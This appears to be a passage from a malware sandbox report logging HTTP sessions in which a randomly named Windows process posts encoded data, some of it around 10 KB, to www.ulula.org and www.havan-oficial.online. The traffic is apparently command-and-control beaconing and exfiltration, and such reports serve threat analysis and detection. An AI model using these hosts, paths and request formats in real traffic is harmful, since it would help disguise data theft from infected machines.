fZah6=a0uzLfJNKFJNLRtRvoWJZqP5CCeq3xCXUUUfzWyomure8Ze7dYH6NrhTFsyopOvfkkQIApzAU5XqnYpWvAyuGwoHgkTyaJsrI0zfziGlyc9XT3OjdE2JjjH6KjvQAI5G6CKNxDZ1NExrSPsKRNoKhZPRWSSUTInf+Kbq682nD1qcRr8IfRjX3OBXoflUS2yy3g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49806	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:02.848359108 CET	786	OUT	POST /4w1b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.ulula.org Origin: http://www.ulula.org Referer: http://www.ulula.org/4w1b/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 61 30 75 7a 4c 66 4a 4e 4b 46 4a 4e 4e 78 64 52 74 4c 2b 4a 4e 36 50 2b 4f 69 65 71 35 52 43 74 55 55 49 66 7a 55 65 34 6c 63 66 65 38 37 57 37 54 35 48 36 45 37 68 54 52 38 79 74 32 65 76 51 6b 6b 55 66 41 6f 50 41 55 35 54 71 6e 61 68 57 75 33 65 76 48 67 6f 42 73 45 54 77 45 35 73 72 49 30 7a 66 7a 68 36 63 79 63 31 58 55 44 79 6a 63 6c 32 4f 39 54 48 31 65 7a 76 51 45 49 35 4b 36 43 4c 59 78 43 56 62 4e 48 4a 72 53 4f 38 4b 52 35 30 4a 72 5a 4f 55 49 69 54 52 51 59 36 50 33 37 72 6c 6e 64 65 64 43 56 2b 59 5a 4e 78 53 4f 67 43 41 6c 4f 6c 6b 31 59 73 67 66 31 50 37 73 75 43 53 66 37 4f 47 4d 39 53 37 6b 2b 4d 35 68 30 56 74 57 50 41 3d Data Ascii: fZah6=a0uzLfJNKFJNNxdRtL+JN6P+Oieq5RCtUUIfzUe4lcfe87W7T5H6E7hTR8yt2evQkkUfAoPAU5TqnahWu3evHgoBsETwE5srI0zfzh6cyc1XUDyjcl2O9TH1ezvQEI5K6CLYxCVbNHJrSO8KR50JrZOUIiTRQY6P37rlndedCV+YZNxSOgCAlOlk1Ysgf1P7suCSf7OGM9S7k+M5h0VtWPA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49822	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:05.397701979 CET	10868	OUT	POST /4w1b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.ulula.org Origin: http://www.ulula.org Referer: http://www.ulula.org/4w1b/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 61 30 75 7a 4c 66 4a 4e 4b 46 4a 4e 4e 78 64 52 74 4c 2b 4a 4e 36 50 2b 4f 69 65 71 35 52 43 74 55 55 49 66 7a 55 65 34 6c 63 6e 65 39 4f 43 37 54 61 66 36 57 72 68 54 53 38 79 73 32 65 76 33 6b 6b 74 33 41 6f 44 51 55 36 6e 71 6e 34 5a 57 70 44 4b 76 65 77 6f 42 6b 6b 54 31 61 4a 73 2b 49 30 6a 62 7a 69 53 63 79 63 31 58 55 46 57 6a 4e 30 32 4f 2f 54 48 36 4b 6a 76 4d 41 49 34 64 36 43 44 49 78 43 42 6c 4e 58 70 72 54 76 4d 4b 57 63 6f 4a 70 35 4f 57 4a 69 54 33 51 59 33 56 33 2f 79 55 6e 64 61 33 43 58 69 59 64 62 41 6a 63 45 66 59 35 39 59 2f 68 37 77 2f 66 58 6e 39 72 2b 2b 64 52 49 4f 61 66 74 4f 57 6c 50 6c 70 2b 52 5a 6d 4b 59 5a 5a 6d 69 59 39 35 59 77 4e 4e 49 79 70 7a 2b 45 53 42 72 36 5a 42 32 75 71 65 57 73 37 48 4f 56 70 70 42 75 36 4a 4b 66 77 58 51 35 76 4a 43 31 54 7a 71 47 6f 43 4c 31 78 72 48 65 47 47 53 68 6b 64 46 67 73 78 71 55 45 35 35 62 6b 79 4c 6b 37 47 50 68 72 56 35 68 74 68 73 65 70 67 42 63 64 36 2b 63 70 52 59 73 2b 39 4d 42 53 79 33 67 45 76 49 65 42 [TRUNCATED] Data Ascii: fZah6=a0uzLfJNKFJNNxdRtL+JN6P+Oieq5RCtUUIfzUe4lcne9OC7Taf6WrhTS8ys2ev3kkt3AoDQU6nqn4ZWpDKvewoBkkT1aJs+I0jbziScyc1XUFWjN02O/TH6KjvMAI4d6CDIxCBlNXprTvMKWcoJp5OWJiT3QY3V3/yUnda3CXiYdbAjcEfY59Y/h7w/fXn9r++dRIOaftOWlPlp+RZmKYZZmiY95YwNNIypz+ESBr6ZB2uqeWs7HOVppBu6JKfwXQ5vJC1TzqGoCL1xrHeGGShkdFgsxqUE55bkyLk7GPhrV5hthsepgBcd6+cpRYs+9MBSy3gEvIeBSVy9+KcnJ26+icjtTk83KzkiEeEMNjh5ESoQao7aXVAiZuBJyEqHYV0oFqIuPLC8wd7GZg9zQE5lIqfFEyJbk0gI0yKwi2mvK0oM7QB8lkQZrX1nRmaMvTzo605JEGBl6UoMcF0+g2ZkZA+ycPj2O2YXG0NQFIU227Ah2BF1UISGFAF1oQDX+PNNRqRf1rfU8H+jEM6MqEODOtO94tMPVoeJvTj//6WmDnuCKseOmimRsm5ERKGW7lnaceo4mbma56r8TirpJ9S9o3AXP/KvjRfXBKGZgaIraPgwn0yARIu9+ptQBdNF4OIQtnDz9kae1+sEHhFVTCcrDKOaIlTAUypNZ9RegrU13jpT4FsB2b8YF/WNSQ6h18zKQvYxOUteChnZtS7JNmuCy3o3wBjnqkzE7B/kyg/Vsej74AF3RMX959Sj62RE/OQavhOLRx7CSlZGle/ZJ612XSvdKCSVmIif+aAokwkR2mnXjD//PlnF8ZoUdmlLYJHKU/ctG/4C8D3sGqhBlNyU/iynYltuGgoeWVJUJ+jxHoYZCN7nHa0ckc1Qy9UAL45vdkgxbYZG810FneuFISZex1n4QmB5mRdyw1/7uO+Fn815A0d77RrjAIgppfwNwcdUDMj/g6Fzcnl9SUJjeWpYnEqwoamj9WRQcgMTfRHoGh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49843	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:07.941097975 CET	518	OUT	GET /4w1b/?42T8f=ABwh0lAHdJnXMBd&fZah6=X2GTIolTa1UnBQ8Mt4GmPrXHDjrv0FKKXiYqznC6itjD0Z2FTorZXZ1nTumJudmkhSgQe73MRozJqa0gxwnUHUwni1KndLADF3HY4z2B7/J9VzK4aV2y2BM= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ulula.org User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:51:08.375952005 CET	403	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 05:51:08 GMT Content-Type: text/html Content-Length: 263 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 32 54 38 66 3d 41 42 77 68 30 6c 41 48 64 4a 6e 58 4d 42 64 26 66 5a 61 68 36 3d 58 32 47 54 49 6f 6c 54 61 31 55 6e 42 51 38 4d 74 34 47 6d 50 72 58 48 44 6a 72 76 30 46 4b 4b 58 69 59 71 7a 6e 43 36 69 74 6a 44 30 5a 32 46 54 6f 72 5a 58 5a 31 6e 54 75 6d 4a 75 64 6d 6b 68 53 67 51 65 37 33 4d 52 6f 7a 4a 71 61 30 67 78 77 6e 55 48 55 77 6e 69 31 4b 6e 64 4c 41 44 46 33 48 59 34 7a 32 42 37 2f 4a 39 56 7a 4b 34 61 56 32 79 32 42 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?42T8f=ABwh0lAHdJnXMBd&fZah6=X2GTIolTa1UnBQ8Mt4GmPrXHDjrv0FKKXiYqznC6itjD0Z2FTorZXZ1nTumJudmkhSgQe73MRozJqa0gxwnUHUwni1KndLADF3HY4z2B7/J9VzK4aV2y2BM="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49888	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:13.557723999 CET	799	OUT	POST /6yvy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.havan-oficial.online Origin: http://www.havan-oficial.online Referer: http://www.havan-oficial.online/6yvy/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 53 6a 31 69 6c 4d 64 4a 78 72 2f 52 66 43 70 35 78 61 59 35 2b 71 4b 6d 2b 58 4d 6b 74 57 73 58 69 51 72 72 44 58 57 67 38 44 2b 78 4e 48 65 58 30 34 6b 39 6e 50 50 2f 32 61 39 38 38 65 41 59 71 65 71 35 7a 6e 33 6a 45 39 41 48 73 78 6d 30 67 39 75 30 6d 50 61 48 4b 6b 49 73 31 6e 52 46 72 4c 70 4c 65 51 71 6b 56 63 76 72 68 4e 33 39 59 55 6b 43 43 53 79 30 50 49 41 65 50 39 37 4a 2b 54 4c 77 61 51 45 70 30 6c 4d 57 79 37 68 46 32 34 6d 78 68 4c 4c 36 66 4c 59 44 71 39 64 2f 42 43 68 74 65 62 74 6c 47 52 33 78 5a 72 67 78 77 52 69 30 36 37 62 4f 49 75 69 50 42 6a 76 42 61 77 3d 3d Data Ascii: fZah6=Sj1ilMdJxr/RfCp5xaY5+qKm+XMktWsXiQrrDXWg8D+xNHeX04k9nPP/2a988eAYqeq5zn3jE9AHsxm0g9u0mPaHKkIs1nRFrLpLeQqkVcvrhN39YUkCCSy0PIAeP97J+TLwaQEp0lMWy7hF24mxhLL6fLYDq9d/BChtebtlGR3xZrgxwRi067bOIuiPBjvBaw==
Nov 11, 2024 06:51:13.963620901 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:51:12 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: c4847049-71df-4dec-ad4a-aa8d9755475b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw== set-cookie: parking_session=c4847049-71df-4dec-ad4a-aa8d9755475b; expires=Mon, 11 Nov 2024 06:06:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6f 51 68 4e 67 69 6e 63 6c 4b 79 65 5a 56 57 53 51 6c 76 74 33 59 42 70 59 46 47 77 6c 6f 43 54 76 52 78 61 58 33 44 6c 49 31 51 73 63 55 74 2f 6a 6f 65 45 44 6f 64 70 4e 66 37 78 31 6b 37 5a 6c 45 79 74 74 6a 37 5a 46 57 2f 31 7a 52 53 30 55 4b 54 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:51:13.963634968 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzQ4NDcwNDktNzFkZi00ZGVjLWFkNGEtYWE4ZDk3NTU0NzViIiwicGFnZV90aW1lIjoxNzMxMzA0Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49910	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:16.100064039 CET	819	OUT	POST /6yvy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.havan-oficial.online Origin: http://www.havan-oficial.online Referer: http://www.havan-oficial.online/6yvy/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 53 6a 31 69 6c 4d 64 4a 78 72 2f 52 66 69 35 35 7a 37 59 35 34 4b 4b 6e 78 33 4d 6b 69 32 73 54 69 51 6e 72 44 57 53 77 38 51 61 78 4e 6c 47 58 31 35 6b 39 67 50 50 2f 34 36 39 35 68 4f 41 48 71 65 32 78 7a 6e 62 6a 45 35 6f 48 73 30 43 30 67 4c 6d 33 6e 66 61 2f 54 55 49 75 34 48 52 46 72 4c 70 4c 65 51 2f 7a 56 63 33 72 68 38 48 39 61 77 77 46 65 69 79 31 4f 49 41 65 4c 39 37 4e 2b 54 4c 65 61 56 63 51 30 67 49 57 79 2f 74 46 31 70 6d 79 75 4c 4c 34 42 37 5a 48 37 63 35 30 41 33 41 66 65 4c 42 57 41 68 48 79 63 74 74 72 68 67 44 6a 6f 37 2f 39 56 70 72 37 4d 67 53 49 42 2f 38 41 2f 44 35 55 43 4c 49 76 37 43 70 6b 37 41 37 43 32 42 41 3d Data Ascii: fZah6=Sj1ilMdJxr/Rfi55z7Y54KKnx3Mki2sTiQnrDWSw8QaxNlGX15k9gPP/4695hOAHqe2xznbjE5oHs0C0gLm3nfa/TUIu4HRFrLpLeQ/zVc3rh8H9awwFeiy1OIAeL97N+TLeaVcQ0gIWy/tF1pmyuLL4B7ZH7c50A3AfeLBWAhHycttrhgDjo7/9Vpr7MgSIB/8A/D5UCLIv7Cpk7A7C2BA=
Nov 11, 2024 06:51:16.515707016 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:51:15 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: ec313261-ec2d-4045-af50-6bde92001920 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw== set-cookie: parking_session=ec313261-ec2d-4045-af50-6bde92001920; expires=Mon, 11 Nov 2024 06:06:16 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6f 51 68 4e 67 69 6e 63 6c 4b 79 65 5a 56 57 53 51 6c 76 74 33 59 42 70 59 46 47 77 6c 6f 43 54 76 52 78 61 58 33 44 6c 49 31 51 73 63 55 74 2f 6a 6f 65 45 44 6f 64 70 4e 66 37 78 31 6b 37 5a 6c 45 79 74 74 6a 37 5a 46 57 2f 31 7a 52 53 30 55 4b 54 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:51:16.515721083 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWMzMTMyNjEtZWMyZC00MDQ1LWFmNTAtNmJkZTkyMDAxOTIwIiwicGFnZV90aW1lIjoxNzMxMzA0Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49931	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:18.651823997 CET	10901	OUT	POST /6yvy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.havan-oficial.online Origin: http://www.havan-oficial.online Referer: http://www.havan-oficial.online/6yvy/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 53 6a 31 69 6c 4d 64 4a 78 72 2f 52 66 69 35 35 7a 37 59 35 34 4b 4b 6e 78 33 4d 6b 69 32 73 54 69 51 6e 72 44 57 53 77 38 51 53 78 4d 51 53 58 30 65 34 39 68 50 50 2f 77 61 39 34 68 4f 42 64 71 65 75 31 7a 6e 47 55 45 2f 73 48 74 58 36 30 77 2b 47 33 74 66 61 2f 62 30 49 72 31 6e 51 48 72 4c 35 50 65 51 76 7a 56 63 33 72 68 2f 76 39 4d 30 6b 46 4e 79 79 30 50 49 41 6f 50 39 37 6c 2b 54 44 6f 61 55 6f 41 30 30 38 57 79 62 42 46 35 2f 61 79 6e 4c 4c 2b 41 37 5a 68 37 63 45 73 41 7a 70 6d 65 4c 45 65 41 69 62 79 51 70 67 76 31 52 6a 65 72 4b 6e 48 4c 65 65 59 4d 42 2b 56 50 2b 6f 69 33 79 74 61 59 62 30 4d 35 43 67 56 69 41 72 66 68 68 72 41 59 41 42 62 64 48 44 64 63 68 77 6d 71 56 55 64 47 55 62 4e 4c 38 6b 47 32 56 43 56 6b 58 33 66 4e 61 4c 52 41 68 2b 37 61 46 36 74 6f 43 76 57 52 2b 63 55 32 78 65 43 54 53 4e 57 37 45 75 69 77 30 4c 56 42 2b 6f 38 72 34 30 6b 5a 6a 57 47 57 65 37 76 77 57 59 39 49 39 30 68 47 37 66 65 75 78 6e 54 2b 48 37 6d 6b 66 61 32 66 63 63 6f 6d 37 38 38 [TRUNCATED] Data Ascii: fZah6=Sj1ilMdJxr/Rfi55z7Y54KKnx3Mki2sTiQnrDWSw8QSxMQSX0e49hPP/wa94hOBdqeu1znGUE/sHtX60w+G3tfa/b0Ir1nQHrL5PeQvzVc3rh/v9M0kFNyy0PIAoP97l+TDoaUoA008WybBF5/aynLL+A7Zh7cEsAzpmeLEeAibyQpgv1RjerKnHLeeYMB+VP+oi3ytaYb0M5CgViArfhhrAYABbdHDdchwmqVUdGUbNL8kG2VCVkX3fNaLRAh+7aF6toCvWR+cU2xeCTSNW7Euiw0LVB+o8r40kZjWGWe7vwWY9I90hG7feuxnT+H7mkfa2fccom7883AzLTTwV+K2RK08QtxYn0aIr9h0MNWI1DfzxbW+q//0UmoZao1LFtpZOqEu0PUOFJ1Ga8aaocCPWDfCcZ/XArTNXKaaEthk8WUpp9JZzxcqYkoYgRvgV3G6B3f8hbOa33JzXzQIu6MTmtIYz3IkO01ZL+JmL2zQiBDuDGK4IWviiNZev1m9kRrZ5J953B/WQpjrgcQKKAAfa9R0Kyo50Ve4sil0R4OefSLc7IlIueAw1MTq5U2Gmq3NX1Gj+IES7D+iQmRuyJYNLDRDSG+y6VDS4b2t4b29Ank+5yG7cdGtW0sP1x0XHg1I7bzODA4ziw4jMtJdrrYv8l4+QHDcMFYMcMFc2GW/2tJVBIV8Aze9Tuf0e1NXyeVp08wqyMdJl2WBKirR9UlpT07GsqIRkhh8b8w4kZ/1AZw8nJgF6hlSDzhjrpM8J0d4Jgi4nTiljkyKJGuq80PF0gMZNnatvfPyBpoW2n+Xxwm+3yh1gupej/ZDhpnxLfrJEy9l+8Wqk2Jcmk1U4Wb6RgkY1Oa3T9nYqjZXljn5meb7j4+hQ71C1JrPztC3CApxPMb4fgMDkGltKasQjU39uNz3/EU5bbO6xK+8s1lv8gJfQK8a8l6GBHDRdrxzj96leCCl14ZQaPKt/HEmblIlit96gcqA7xRlAam2PYDeNfS [TRUNCATED]
Nov 11, 2024 06:51:19.075390100 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:51:18 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: e935471b-37b4-4947-a6ce-be45178dc163 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw== set-cookie: parking_session=e935471b-37b4-4947-a6ce-be45178dc163; expires=Mon, 11 Nov 2024 06:06:19 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6f 51 68 4e 67 69 6e 63 6c 4b 79 65 5a 56 57 53 51 6c 76 74 33 59 42 70 59 46 47 77 6c 6f 43 54 76 52 78 61 58 33 44 6c 49 31 51 73 63 55 74 2f 6a 6f 65 45 44 6f 64 70 4e 66 37 78 31 6b 37 5a 6c 45 79 74 74 6a 37 5a 46 57 2f 31 7a 52 53 30 55 4b 54 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 